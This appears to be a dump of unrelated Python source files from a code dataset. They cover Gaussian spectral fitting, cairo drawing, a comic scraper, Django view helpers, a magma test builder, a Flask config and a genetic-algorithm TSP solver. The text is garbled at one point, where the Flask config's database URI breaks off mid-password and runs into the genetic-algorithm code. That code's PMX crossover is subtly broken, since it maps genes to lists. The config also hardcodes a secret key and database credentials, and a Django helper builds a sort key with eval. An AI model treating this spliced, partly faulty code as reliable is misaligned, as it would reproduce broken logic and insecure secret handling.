np.array([calculate_gaussian_absorption(e,\n best_vals_Opt[0],\n best_vals_Opt[1],\n best_vals_Opt[2],\n T)\n for e in energy_data])\n if R2_Opt is None:\n R2_Opt = R_squared(y_data=eqe_data,\n yfit_data=Opt_fit.tolist(),\n bias=bias,\n tolerance=tolerance)\n if include_disorder:\n CT_fit = np.array([calculate_gaussian_disorder_absorption(e,\n best_vals_CT[0],\n best_vals_CT[1],\n best_vals_CT[2],\n best_vals_CT[3],\n T)\n for e in energy_data])\n\n else:\n CT_fit = np.array([calculate_gaussian_absorption(e,\n best_vals_CT[0],\n best_vals_CT[1],\n best_vals_CT[2],\n T)\n for e in energy_data])\n if R2_CT is None:\n R2_CT = R_squared(y_data=eqe_data,\n yfit_data=CT_fit.tolist(),\n bias=bias,\n tolerance=tolerance)\n\n if len(Opt_fit) == len(CT_fit):\n combined_Fit = Opt_fit + CT_fit\n combined_R_Squared = R_squared(y_data=eqe_data,\n yfit_data=combined_Fit.tolist(),\n bias=bias,\n tolerance=tolerance)\n\n else: # if any of the fits were unsuccessful\n Opt_fit = 0\n CT_fit = 0\n combined_Fit = 0\n combined_R_Squared = 0\n\n average_R_Squared = (R2_CT + R2_Opt + combined_R_Squared) / 3\n\n result_dict = {'R2_Combined': combined_R_Squared,\n 'R2_CT': R2_CT,\n 'R2_Opt': R2_Opt,\n 'R2_Average': average_R_Squared,\n 'Combined_Fit': combined_Fit,\n 'Opt_Fit': Opt_fit,\n 'CT_Fit': CT_fit,\n 'Energy': energy_data,\n 'EQE': eqe_data\n }\n\n return result_dict\n\n # # Old code to return a list instead of dictionary\n # return 
[combined_R_Squared, combined_Fit, Opt_fit, CT_fit, energy_data, eqe_data]\n\n# -----------------------------------------------------------------------------------------------------------\n","sub_path":"source/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345112236","text":"with open('cafe.txt', 'w', encoding='utf-8') as f:\n f.write('cafe')\nwith open('cafe.txt', encoding='utf-8') as f:\n msg = f.read()\n print(msg)\nimport csv\n\nwith open('eggs.csv', 'w', newline='') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=' ',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow(['Spam'] * 5 + ['Baked Beans'])\n spamwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n","sub_path":"test/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"608962536","text":"import cairo\r\nimport numpy as np\r\n\r\nclass Shape:\r\n def __init__(self, stroke = None, fill = None):\r\n self.stroke = stroke\r\n self.fill = fill\r\n \r\n def draw(self, ctx):\r\n draw_stroke(ctx, self.stroke)\r\n draw_fill(ctx, self.fill)\r\n\r\nclass Circle(Shape):\r\n def __init__(self, cx, cy, radius, **kwargs):\r\n super().__init__(**kwargs)\r\n self.args = [cx, cy, radius]\r\n \r\n def draw(self, ctx):\r\n ctx.arc(*self.args, 0, 2 * np.pi)\r\n super().draw(ctx)\r\n\r\nclass Rectangle(Shape):\r\n def __init__(self, x, y, w, h, **kwargs):\r\n super().__init__(**kwargs)\r\n self.args = [x, y, w, h]\r\n \r\n def draw(self, ctx):\r\n ctx.rectangle(*self.args)\r\n super().draw(ctx)\r\n\r\nclass ShapeGroup:\r\n def __init__(self, shapes):\r\n \"\"\"\r\n shapes: dict of shapes\r\n \"\"\"\r\n self.shapes = shapes\r\n \r\n def draw(self, ctx):\r\n shapes = self.shapes\r\n for key in shapes:\r\n value = shapes[key]\r\n value.draw(ctx)\r\n \r\nclass Transform:\r\n def __init__(self, children = None, translation = None, rotation = None, scale = None):\r\n \"\"\"\r\n translation = (tx, ty)\r\n rotation = angle\r\n scale = (sx, sy)\r\n \"\"\"\r\n self.translation = translation\r\n self.rotation = rotation\r\n self.scale = scale\r\n self.children = children\r\n \r\n def draw(self, ctx):\r\n if self.children is not None:\r\n ctx.save()\r\n if self.translation is not None:\r\n ctx.translate(*self.translation)\r\n if self.rotation is not None:\r\n ctx.rotate(np.radians(self.rotation))\r\n if self.scale is not None:\r\n ctx.scale(*self.scale)\r\n self.children.draw(ctx)\r\n ctx.restore()\r\n\r\ndef draw_stroke(ctx, stroke = None):\r\n if stroke is None:\r\n return\r\n \r\n thickness, color = stroke\r\n ctx.set_line_width(thickness)\r\n ctx.set_source_rgb(*color)\r\n ctx.stroke()\r\n \r\ndef draw_fill(ctx, fill = None):\r\n if fill is None:\r\n return\r\n ctx.set_source_rgb(*fill)\r\n ctx.fill() ","sub_path":"code/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"115982258","text":"from bs4 import BeautifulSoup\nimport requests\n\nwebsite = {\n \"bonequest\": 'https://www.bonequest.com',\n \"nedroid\": 'http://nedroid.com/',\n \"xkcd\": 'https://xkcd.com',\n \"cyanide\": \"http://explosm.net\"\n}\n\ndef getComic(website):\n response = requests.get(website, timeout=5)\n content = BeautifulSoup(response.content, \"html.parser\")\n return 
content\n\ndef bonequest(content):\n comictxt = content.find('div', attrs={\"class\": \"porn-van-to-mexico\"}).text\n print(comictxt)\n image = content.find('img', {\"class\": \"hitler\"})\n print(website[\"bonequest\"] + image.get('src'))\n\ndef nedroid(content):\n image = content.find('div', attrs={\"id\" : \"comic\"}).img\n print(image.get('src'))\n \ndef xkcd(content):\n image = content.find('div', attrs={\"id\": \"comic\"}).img\n print(website[\"xkcd\"] + image.get('src'))\n\ndef cyanide(content):\n image = content.find('img', attrs={\"id\": \"main-comic\"})\n print(image.get('src'))\n\nbonequest(getComic(website[\"bonequest\"]))\nnedroid(getComic(website[\"nedroid\"]))\nxkcd(getComic(website[\"xkcd\"]))\ncyanide(getComic(website[\"cyanide\"]))\n\n\n ","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449861147","text":"'''\nDjango Generic View Extensions\n\nModel Extensions\n\nOne aim with these Extensions is to help concentrate model specific configurations in the model declaration.\n\nOf particular note, we add support for a number of attributes that can be used in models to achieve certain outcomes.\n\nadd_related, is a way of listing relations without which this model makes no sense.\n \n for example: if you have a models Team and Member, the Team model may have: \n add_related = 'members'\n assuming Team has a ManyToMany relationship with Member and an attribute \"members\".\n \n This would request of the CreateViewExtended and UpdateViewExtended that they provide enough form\n info to easily build rich forms (say a Team form, with a list of Member forms under it).\n \n Similarly the DetailViewExtended wants a rich object to display, as defined by the newteork of\n add_related links. \n \nsort_by, is like the Django Meta option \"ordering\" only it can include properties of the model.\n\nlink_internal and link_external, are two attributes (or properties) that can supply a URL (internal or external respectively)\n\n By internal we mean a link to the DetailView of the object (model instance) that supplies the link_internal.\n \n By external we mean a link to some other site if desired. For example you may have a model Person, and the \n external link may point to their profile on Facebook or LinkedIn or wherever. We support only one external\n link conveniently for now.\n \n__verbose_str_,\n__rich_str__,\n__detail_str__, are properties like __str__ that permit a model to supply different degrees of detail.\n\n This is intended to support the .options and levels of detail in views.\n \n A convention is assumed in which:\n \n __str__ references only model fields (should be fast to provide), contain no HTML and ideally no \n newlines (if possible). 
\n \n __verbose_str__ can reference related model fields (can be a little slower), contain no HTML and ideally \n no newlines (if possible)\n \n __rich_str__ like __verbose_str__, but can contain internal HTML markup for a richer presentation.\n Should have a signature of:\n def __rich_str__(self, link=None):\n and should call on field_render herein passing that link in.\n \n __detail_str__ like __richs_str__, but can span multiple lines.\n Should have a signature of:\n def __detail_str__(self, link=None):\n and should call on field_render herein passing that link in.\n \nTODO: Add __table_str__ which returns a TR, and if an arg is specified or if it's a class method perhaps a header TR \n'''\n# Python imports\nimport html, collections, inspect\n\n# Django imports\nfrom django.db import models\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import get_current_timezone\n\n# Package imports\nfrom . import FIELD_LINK_CLASS, NONE, NOT_SPECIFIED\nfrom .util import isListType, isListValue, isDictionary, safetitle\nfrom .datetime import time_str\nfrom .options import default, flt, osf, odf\nfrom .decorators import is_property_method\nfrom .html import odm_str, fmt_str\nfrom django_generic_view_extensions.debug import print_debug\n\nsummary_methods = [\"__str__\", \"__verbose_str__\", \"__rich_str__\", \"__detail_str__\"] \n\ndef add_related(model):\n '''\n Provides a safe way of testing a given model's add_related attribute by ensuring always \n a list is provided.\n \n If a model has an attribute named add_related and it is a string that names\n \n 1) a field in this model, or\n 2) a field in another model in the format model.field\n \n or a list of such strings, then we take this as an instruction to include that\n those fields should be included in forms for the model.\n \n The attribute may be missing, None, or invalid as well, and so to make testing\n easier throughout the generic form processors this function always returns a list,\n empty if no valid add_related is found.\n '''\n \n if not hasattr(model, \"add_related\"):\n return []\n \n if isinstance(model.add_related, str):\n return [model.add_related]\n\n if isinstance(model.add_related, list):\n return model.add_related\n \n return []\n\ndef inherit_fields(model):\n '''\n Provides a safe way of testing a given model's inherit_fields attribute by ensuring always \n a list is provided.\n \n If a model has an attribute named inherit_fields and it is a string that names\n \n 1) a field in this model, or\n 2) a field in another model in the format model.field\n \n or a list of such strings, then we take this as an instruction to inherit\n the values of those fields form form to form during one login session.\n \n The attribute may be missing, None, or invalid as well, and so to make testing\n easier throughout the generic form processors this function always returns a list,\n empty if no valid add_related is found.\n '''\n \n if not hasattr(model, \"inherit_fields\"):\n return []\n \n if isinstance(model.inherit_fields, str):\n return [model.inherit_fields]\n\n if isinstance(model.inherit_fields, list):\n return model.inherit_fields\n \n return [] \n\ndef apply_sort_by(queryset):\n '''\n Sorts a query set by the the fields and properties listed in a sort_by attribute if it's specified.\n This augments the meta option order_by in models because that option cannot respect properties.\n This option though wants a sortable property to be specified and that isn't an object, has to be\n like an int or string or 
something, specifically a field in the object that is sortable. So usage\n is a tad different to order_by. \n '''\n model = queryset.model\n if hasattr(model, 'sort_by'):\n try: \n sort_lambda = \"lambda obj: (obj.\" + \", obj.\".join(model.sort_by) +\")\"\n return sorted(queryset, key=eval(sort_lambda))\n except Exception:\n return queryset\n else:\n return queryset\n\ndef link_target_url(obj, link_target=None):\n '''\n Given an object returns the url linking to that object as defined in the model methods.\n :param obj: an object, being an instance of a Django model which has link methods\n :param link_target: a field_link_target that selects which link method to use\n '''\n url = \"\"\n \n if link_target is None:\n link_target = default(flt)\n \n if link_target == flt.internal and hasattr(obj, \"link_internal\"):\n url = obj.link_internal\n elif link_target == flt.external and hasattr(obj, \"link_external\"):\n url = obj.link_external\n \n return url\n\ndef field_render(field, link_target=None, sum_format=None):\n '''\n Given a field attempts to render it as text to use in a view. Tries to do two things:\n \n 1) Wrap it in an HTML Anchor tag if requested to. Choosing the appropriate URL to use as specified by link_target.\n 2) Convert the field to text using a method selected by sum_format. \n \n :param field: The contents of a field that we want to wrap in a link. This could be a text scalar value \n or an object. If it's a scalar value we do no wrapping and just return it unchanged. If it's an object \n we check and honor the specified link_target and sum_format as best possible. \n \n :param link_target: a field_link_target which tells us what to link to. \n The object must provide properties that return a URL for this purpose.\n \n :param sum_format: an object_summary_format which tells us which string representation to use. 
The \n object should provide methods that return a string for each possible format, if not, there's a \n fall back trickle down to the basic str() function.\n\n detail and rich summaries are expected to contain HTML code including links so they need to know the link_target \n and cannot be wrapped in an Anchor tag and must be marked safe\n \n verbose and brief summaries are expected to be free of HTML so can be wrapped in an Anchor tag and don't\n need to be marked safe.\n '''\n if link_target is None:\n link_target = default(flt)\n \n if sum_format is None:\n sum_format = default(osf)\n \n tgt = None\n \n if link_target == flt.mailto:\n tgt = f\"mailto:{field}\" \n elif isinstance(link_target, str) and link_target:\n tgt = link_target\n elif link_target == flt.internal and hasattr(field, \"link_internal\"):\n tgt = field.link_internal\n elif link_target == flt.external and hasattr(field, \"link_external\"):\n tgt = field.link_external\n\n fmt = sum_format\n txt = None \n if fmt == osf.detail:\n if callable(getattr(field, '__detail_str__', None)):\n tgt = None\n txt = field.__detail_str__(link_target)\n else:\n fmt = osf.rich\n \n if fmt == osf.rich:\n if callable(getattr(field, '__rich_str__', None)):\n tgt = None\n txt = field.__rich_str__(link_target)\n else:\n fmt = osf.verbose\n \n if fmt == osf.verbose:\n if callable(getattr(field, '__verbose_str__', None)):\n txt = html.escape(field.__verbose_str__())\n else:\n fmt = osf.brief\n\n if fmt == osf.brief:\n if callable(getattr(field, '__str__', None)):\n txt = html.escape(field.__str__())\n else:\n if isinstance(field, models.DateTimeField):\n txt = time_str(field)\n else:\n txt = str(field)\n\n if fmt == osf.template:\n if hasattr(field, 'pk'):\n txt = f\"{{{field._meta.model.__name__}.{field.pk}}}\"\n else:\n txt = \"{field_value}\" \n raise ValueError(\"Internal error, template format not supported for field.\")\n\n if link_target == flt.template:\n tgt = \"{{link.{}.{}.{}}}\".format(FIELD_LINK_CLASS, field._meta.model.__name__, field.pk)\n return mark_safe(u'{}{}{}'.format(tgt, txt, '{link_end}')) # Provides enough info for a template to build the link below. \n elif tgt is None:\n return mark_safe(txt)\n else:\n return mark_safe(u'{}'.format(tgt, FIELD_LINK_CLASS, txt)) \n\ndef object_in_list_format(obj, context):\n '''\n For use in a template tag which can simply pass the object (from the context item object_list) \n and context here and this will produce a string (marked safe as needed) for rendering respecting\n the requests that came in via the context. 
\n :param obj: an object, probably from the object_list in a context provided to a list view template \n :param context: the context provided to the view (from which we can extract the formatting requests)\n '''\n # we expect an instance list_display_format in the context element \"format\" \n fmt = context['format'].elements\n flt = context['format'].link\n \n return field_render(obj, flt, fmt)\n\ndef collect_rich_object_fields(view):\n '''\n Passed a view instance (a detail view or delete view is expected, but any view could call this) \n which has an object already (view.obj) (so after or in get_object), will define view.fields with \n a dictionary of fields that a renderer can walk through later.\n \n Additionally view.fields_bucketed is a copy of view.fields in the buckets specified in object_display_format\n and view.fields_flat and view.fields_list also contain all the view.fields split into the scalar (flat) values\n and the list values respectively (which are ToMany relations to other models).\n \n Expects ManyToMany relationships to be set up bi-directionally, in both involved models, \n i.e. makes no special effort to find the reverse relationships and if they are not set up \n bi-directionally may miss the indirect, or reverse relationship).\n \n Converts foreign keys to the string representation of that related object using the level of\n detail specified view.format and respecting privacy settings where applicable (values are \n obtained through odm_str where privacy constraints are checked. \n '''\n # Build the list of fields \n # fields_for_model includes ForeignKey and ManyToMany fields in the model definition\n\n # Fields are categorized as follows for convenience and layout and performance decisions\n # flat or list \n # model, internal, related or properties\n #\n # By default we will populate view.fields only with flat model fields.\n \n def is_list(field):\n return hasattr(field,'is_relation') and field.is_relation and (field.one_to_many or field.many_to_many)\n \n def is_property(name):\n return isinstance(getattr(view.model, name), property)\n \n def is_bitfield(field):\n return type(field).__name__==\"BitField\"\n\n ODF = view.format.flags\n\n all_fields = view.obj._meta.get_fields() # All fields\n\n model_fields = collections.OrderedDict() # Editable fields in the model\n internal_fields = collections.OrderedDict() # Non-editable fields in the model\n related_fields = collections.OrderedDict() # Fields in other models related to this one\n \n # Categorize all fields into one of the three buckets above (model, internal, related)\n for field in all_fields:\n if (is_list(field) and ODF & odf.list) or (not is_list(field) and ODF & odf.flat):\n if field.is_relation:\n if ODF & odf.related:\n related_fields[field.name] = field\n else: \n if ODF & odf.model and field.editable and not field.auto_created:\n model_fields[field.name] = field\n elif ODF & odf.internal:\n internal_fields[field.name] = field\n\n # List properties, but respect the format request (list and flat selectors) \n properties = []\n if ODF & odf.properties:\n for name in dir(view.model):\n if is_property(name):\n # Function annotations appear in Python 3.6. In 3.5 and earlier they aren't present.\n # Use the annotations provided on model properties to classify properties and include \n # them based on the classification. The classification is for list and flat respecting \n # the object_display_flags selected. 
That is all we need here.\n if hasattr(getattr(view.model,name).fget, \"__annotations__\"):\n annotations = getattr(view.model,name).fget.__annotations__\n if \"return\" in annotations:\n return_type = annotations[\"return\"]\n if (isListType(return_type) and ODF & odf.list) or (not isListType(return_type) and ODF & odf.flat):\n properties.append(name)\n else:\n properties.append(name)\n else:\n properties.append(name)\n\n # List properties_methods, but respect the format request (list and flat selectors) \n # Look for property_methods (those decorated with property_method and having defaults for all parameters)\n property_methods = []\n if ODF & odf.methods:\n for method in inspect.getmembers(view.obj, predicate=is_property_method):\n name = method[0]\n if hasattr(getattr(view.model,name), \"__annotations__\"):\n annotations = getattr(view.model,name).__annotations__\n if \"return\" in annotations:\n return_type = annotations[\"return\"]\n if (isListType(return_type) and ODF & odf.list) or (not isListType(return_type) and ODF & odf.flat):\n property_methods.append(name)\n else:\n property_methods.append(name)\n\n # List summaries (these are always flat) \n summaries = []\n if ODF & odf.summaries:\n for summary in summary_methods:\n if hasattr(view.model, summary) and callable(getattr(view.model, summary)):\n summaries.append(summary)\n\n # Define some (empty) buckets for all the fields so we can group them on \n # display (by model, internal, related, property, scalars and lists)\n if ODF & odf.flat:\n view.fields_flat = {} # Fields that have scalar values\n view.all_fields_flat = collections.OrderedDict()\n if ODF & odf.model:\n view.fields_flat[odf.model] = collections.OrderedDict()\n if ODF & odf.internal:\n view.fields_flat[odf.internal] = collections.OrderedDict()\n if ODF & odf.related:\n view.fields_flat[odf.related] = collections.OrderedDict()\n if ODF & odf.properties:\n view.fields_flat[odf.properties] = collections.OrderedDict()\n if ODF & odf.methods:\n view.fields_flat[odf.methods] = collections.OrderedDict()\n if ODF & odf.summaries:\n view.fields_flat[odf.summaries] = collections.OrderedDict()\n\n if ODF & odf.list:\n view.fields_list = {} # Fields that are list items (have multiple values)\n view.all_fields_list = collections.OrderedDict()\n if ODF & odf.model:\n view.fields_list[odf.model] = collections.OrderedDict()\n if ODF & odf.internal:\n view.fields_list[odf.internal] = collections.OrderedDict()\n if ODF & odf.related:\n view.fields_list[odf.related] = collections.OrderedDict()\n if ODF & odf.properties:\n view.fields_list[odf.properties] = collections.OrderedDict()\n if ODF & odf.methods:\n view.fields_list[odf.methods] = collections.OrderedDict()\n if ODF & odf.summaries:\n view.fields_list[odf.summaries] = collections.OrderedDict()\n\n # For all fields we've collected set the value and label properly\n # Problem is that relationship fields are by default listed by primary keys (pk)\n # and we want to fetch the actual string representation of that reference an save \n # that not the pk. 
The question is which string (see object_list_format() for the\n # types of string we support).\n for field in all_fields:\n # All fields in other models that point to this one should have an is_relation flag\n\n # These are the field types we can expect:\n # flat\n # simple: a simple database field in this model\n # many_to_one: this is a ForeignKey field pointing to another model\n # one_to_one: this is a OneToOneField\n # list:\n # many_to_many: this is a ManyToManyField, so this object could be pointing at many making a list of items\n # one_to_many this is an _set field (i.e. has a ForeignKey in another model pointing to this model and this field is the RelatedManager)\n #\n # We want to build a fields dictionaries here with field values\n # There are two types of field_value we'd like to report in the result:\n # flat values: fields_flat contains these\n # if the field is scalar, just its value\n # if the field is a relation (a foreign object) its string representation\n # list values: fields_list contains these\n # if the field is a relation to many objects, a list of their string representations\n #\n # We also build fields_model and fields_other\n\n print_debug(f\"Collecting Rich Object Field: {field.name}\")\n bucket = (odf.model if field.name in model_fields\n else odf.internal if field.name in internal_fields\n else odf.related if field.name in related_fields\n else None)\n\n if not bucket is None:\n if is_list(field):\n if ODF & odf.list:\n attname = field.name if hasattr(field,'attname') else field.name+'_set' if field.related_name is None else field.related_name # If it's a model field it has an attname attribute, else it's a _set atttribute\n \n field.is_list = True\n field.label = safetitle(attname.replace('_', ' '))\n \n ros = apply_sort_by(getattr(view.obj, attname).all())\n \n if len(ros) > 0:\n field.value = [odm_str(item, view.format.mode) for item in ros]\n else:\n field.value = NONE\n \n view.fields_list[bucket][field.name] = field\n elif is_bitfield(field):\n if ODF & odf.flat:\n flags = []\n for f in field.flags:\n bit = getattr(getattr(view.obj, field.name), f)\n if bit.is_set:\n flags.append(getattr(view.obj, field.name).get_label(f))\n field.is_list = False\n field.label = safetitle(field.verbose_name)\n \n if len(flags) > 0:\n field.value = odm_str(\", \".join(flags), view.format.mode)\n else:\n field.value = NONE\n \n view.fields_flat[bucket][field.name] = field\n else:\n if ODF & odf.flat:\n field.is_list = False\n field.label = safetitle(field.verbose_name)\n \n field.value = odm_str(getattr(view.obj, field.name), view.format.mode)\n if not str(field.value):\n field.value = NOT_SPECIFIED\n \n view.fields_flat[bucket][field.name] = field\n\n # Capture all the property, property_method and summary values as needed (these are not fields)\n if ODF & odf.properties or ODF & odf.methods or ODF & odf.summaries:\n names = []\n if ODF & odf.properties:\n names += properties\n if ODF & odf.methods:\n names += property_methods\n if ODF & odf.summaries:\n names += summaries\n \n for name in names:\n print_debug(f\"Collecting Rich Object Property: {name}\")\n label = safetitle(name.replace('_', ' '))\n \n # property_methods and summaries are functions, and properties are attributes\n # so we have to fetch their values appropriately \n if name in property_methods:\n value = getattr(view.obj, name)()\n bucket = odf.methods\n elif name in summaries:\n value = getattr(view.obj, name)()\n bucket = odf.summaries\n else:\n value = getattr(view.obj, name)\n bucket = 
odf.properties\n \n if not str(value):\n value = NOT_SPECIFIED\n \n p = models.Field()\n p.label = label\n \n if isListValue(value):\n if ODF & odf.list:\n p.is_list = True\n \n if len(value) == 0:\n p.value = NONE\n elif isDictionary(value):\n # Value becomes Key: Value\n p.value = [f\"{odm_str(k, view.format.mode)}: {odm_str(v, view.format.mode)}\" for k, v in dict.items(value)] \n else:\n p.value = [odm_str(val, view.format.mode) for val in list(value)] \n view.fields_list[bucket][name] = p\n else:\n if ODF & odf.flat:\n p.is_list = False\n p.value = odm_str(value, view.format.mode, True) \n view.fields_flat[bucket][name] = p\n \n # Some more buckets to put the fields in so we can separate lists of fields on display\n view.fields = collections.OrderedDict() # All fields\n view.fields_bucketed = collections.OrderedDict()\n\n buckets = [] \n if ODF & odf.summaries: # Put Summaries at top if they are requested\n view.fields_bucketed[odf.summaries] = collections.OrderedDict()\n buckets += [odf.summaries]\n if ODF & odf.model:\n view.fields_bucketed[odf.model] = collections.OrderedDict()\n buckets += [odf.model]\n if ODF & odf.internal:\n view.fields_bucketed[odf.internal] = collections.OrderedDict()\n buckets += [odf.internal]\n if ODF & odf.related:\n view.fields_bucketed[odf.related] = collections.OrderedDict()\n buckets += [odf.related]\n if ODF & odf.properties:\n view.fields_bucketed[odf.properties] = collections.OrderedDict()\n buckets += [odf.properties]\n if ODF & odf.methods:\n view.fields_bucketed[odf.methods] = collections.OrderedDict()\n buckets += [odf.methods]\n\n for bucket in buckets:\n passes = []\n if ODF & odf.flat:\n passes += [True]\n if ODF & odf.list:\n passes += [False]\n for Pass in passes:\n field_list = view.fields_flat[bucket] if Pass else view.fields_list[bucket]\n for name, value in field_list.items():\n view.fields_bucketed[bucket][name] = value\n view.fields[name] = value\n\nclass TimeZoneMixIn(models.Model):\n '''\n An abstract model that ensures timezone data is saved with all DateTimeField's that have \n a CharField of same name with _tz appended by placing the currentlya ctive Django timezone\n name into that field.\n '''\n \n def update_timezone_fields(self):\n '''\n Update the timezone fields that accompany any DateTimeFields \n '''\n \n for field in self._meta.concrete_fields:\n if isinstance(field, models.DateTimeField):\n tzfieldname = f\"{field.name}_tz\"\n if hasattr(self, tzfieldname):\n setattr(self, tzfieldname, str(get_current_timezone()))\n \n def save(self, *args, **kwargs):\n self.update_timezone_fields()\n super().save(*args, **kwargs)\n\n class Meta:\n abstract = True\n \n","sub_path":"django_generic_view_extensions/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":26586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370213601","text":"\"\"\"\nCopyright (c) 2016-present, Facebook, Inc.\nAll rights reserved.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree. 
An additional grant\nof patent rights can be found in the PATENTS file in the same directory.\n\"\"\"\n\nimport asyncio\nfrom unittest import mock\nfrom magma.common.service import MagmaService\nfrom magma.enodebd.devices.device_map import get_device_handler_from_name\nfrom magma.enodebd.devices.device_utils import EnodebDeviceName\nfrom magma.enodebd.state_machines.enb_acs import EnodebAcsStateMachine\nfrom magma.enodebd.stats_manager import StatsManager\nfrom magma.enodebd.tests.test_utils.config_builder import EnodebConfigBuilder\n\n\nclass EnodebAcsStateMachineBuilder:\n @classmethod\n def build_acs_state_machine(\n cls,\n device: EnodebDeviceName = EnodebDeviceName.BAICELLS,\n ) -> EnodebAcsStateMachine:\n # Build the state_machine\n stats_mgr = StatsManager()\n service = cls.build_magma_service(device)\n handler_class = get_device_handler_from_name(device)\n acs_state_machine = handler_class(service, stats_mgr)\n return acs_state_machine\n\n @classmethod\n def build_magma_service(\n cls,\n device: EnodebDeviceName = EnodebDeviceName.BAICELLS,\n ) -> MagmaService:\n event_loop = asyncio.get_event_loop()\n mconfig = EnodebConfigBuilder.get_mconfig(device)\n service_config = EnodebConfigBuilder.get_service_config()\n with mock.patch('magma.common.service.MagmaService') as MockService:\n MockService.config = service_config\n MockService.mconfig = mconfig\n MockService.loop = event_loop\n return MockService\n","sub_path":"lte/gateway/python/magma/enodebd/tests/test_utils/enb_acs_builder.py","file_name":"enb_acs_builder.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370421146","text":"import os\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nclass Config(object):\n DEBUG = False\n TESTING = False\n SECRET_KEY = 'notejam-flask-secret-key'\n CSRF_ENABLED = True\n CSRF_SESSION_KEY = 'notejam-flask-secret-key'\n SQLALCHEMY_DATABASE_URI = 'mysql://notejam:tYoSZlT&Bf^YLn ind_i.getFitness():\n self.best = ind_i.copy()\n print (\"Best initial sol: \",self.best.getFitness())\n\n def updateBest(self, candidate):\n if self.best == None or candidate.getFitness() < self.best.getFitness():\n self.best = candidate.copy()\n print (\"iteration: \",self.iteration, \"best: \",self.best.getFitness())\n\n def randomSelection(self):\n \"\"\"\n Random (uniform) selection of two individuals\n \"\"\"\n indA = self.matingPool[ random.randint(0, self.popSize-1) ]\n indB = self.matingPool[ random.randint(0, self.popSize-1) ]\n return [indA, indB]\n\n def stochasticUniversalSampling(self):\n # Calculate fitnesses/total fitness\n total_fitness = 0\n fitness_dict = dict()\n count = 0\n # For each individual in the population\n for individual in self.population:\n # Set a lower bound\n lower = total_fitness\n if total_fitness > 0:\n lower += 1\n # Set an upper bound\n upper = total_fitness + individual.getFitness()\n # Add individual to fitness dictionary with value (lower bound,\n # upper bound)\n fitness_dict[count] = (lower, upper, individual)\n # Update total_fitness\n total_fitness += individual.getFitness()\n count += 1\n # For each individual in the dictionary\n for key in fitness_dict:\n # Modify values to be in the range (0, 1)\n fitness_dict[key] = ((fitness_dict[key][0]/total_fitness),\n (fitness_dict[key][1]/total_fitness),\n fitness_dict[key][2])\n # Setting N size\n # SUS will take approx. 
2/3 of the current population size\n new_sample = []\n size = ((len(self.population)/3)*2)\n first_point = 1/size\n interval = random.uniform(0, first_point)\n check = 0\n while interval < (1):\n indiv = fitness_dict[check]\n lower = indiv[0]\n upper = indiv[1]\n person = indiv[2]\n if interval <= upper:\n new_sample += [person]\n interval += first_point\n else:\n check += 1\n return new_sample\n \n \n\n def uniformCrossover(self, indA, indB):\n \"\"\"Executes a uniform crossover and returns a new individual\n :param ind1: The first parent (or individual)\n :param ind2: The second parent (or individual)\n :returns: A new individual\"\"\"\n\n child = Individual(self.genSize, self.data)\n\n # Select random parent to inherit initial genes from\n parent = random.randint(0,1)\n parent1 = indA\n parent2 = indB\n if parent == 0:\n parent1 = indB\n parent2 = indA\n\n # Keep track of values already checked\n values_crossed = []\n \n # For each gene in the selected parent\n for i in range(len(parent1.genes)):\n \n # Randomly decide if the current gene is being kept\n cross = random.randint(0,1)\n\n # If the gene is selected:\n if cross == 1:\n\n # Set the child's gene as the same as the parent, and add\n # the value to the tracker\n child.genes[i] = parent1.genes[i]\n values_crossed += [parent1.genes[i]]\n \n else:\n # Otherwise, set the current gene as none\n child.genes[i] = None\n \n j = 0\n i = 0\n # For each gene in the other parent\n while i < len(parent2.genes):\n\n # If the current gene has a value, continue\n if child.genes[i] != None:\n i += 1\n\n # Otherwise\n elif child.genes[i] == None:\n\n # If the current value hasn't been selected previously\n over = parent2.genes[j]\n if over not in values_crossed:\n\n # Add the value to the checked values, and update the child\n # with the new gene\n values_crossed += [over]\n child.genes[i] = over\n i += 1\n # Continue\n j += 1\n return child\n\n def pmxCrossover(self, indA, indB):\n\n\n child = Individual(self.genSize, self.data)\n \n parent1 = indA\n parent2 = indB\n\n # Keep track of values already checked, and their map\n indices_checked = []\n values_checked = []\n value_maps = dict()\n\n index1 = random.randint(0, len(parent1.genes)-1)\n index2 = random.randint(0, len(parent1.genes)-1)\n\n if index2 < index1:\n tmp = index1\n index1 = index2\n index2 = tmp\n\n for i in range(len(parent1.genes)):\n if i < index1:\n child.genes[i] = None\n elif i > index2:\n child.genes[i] = None\n else: #index is between 2 selected\n child.genes[i] = parent1.genes[i]\n indices_checked += [i]\n values_checked += [parent1.genes[i]]\n value_maps[parent1.genes[i]] = [parent2.genes[i]]\n print(child.genes)\n \n while len(indices_checked) > 0:\n \n current = indices_checked[0]\n value1 = parent1.genes[current]\n value2 = parent2.genes[current]\n \n if value1 == value2:\n indices_checked.remove(current)\n \n else:\n \n cur_val2 = parent2.genes.index(value1)\n mapped = value_maps[value1]\n \n while True:\n \n indices_checked.remove(current)\n \n if mapped not in list(value_maps.keys()):\n \n child.genes[cur_val2] = value2\n values_checked += [value2]\n break\n \n mapped = value_maps[mapped]\n \n j = 0\n i = 0\n # For each gene in the other parent\n while i < len(parent2.genes):\n\n # If the current gene has a value, continue\n if child.genes[i] != None:\n i += 1\n\n # Otherwise\n elif child.genes[i] == None:\n\n # If the current value hasn't been selected previously\n over = 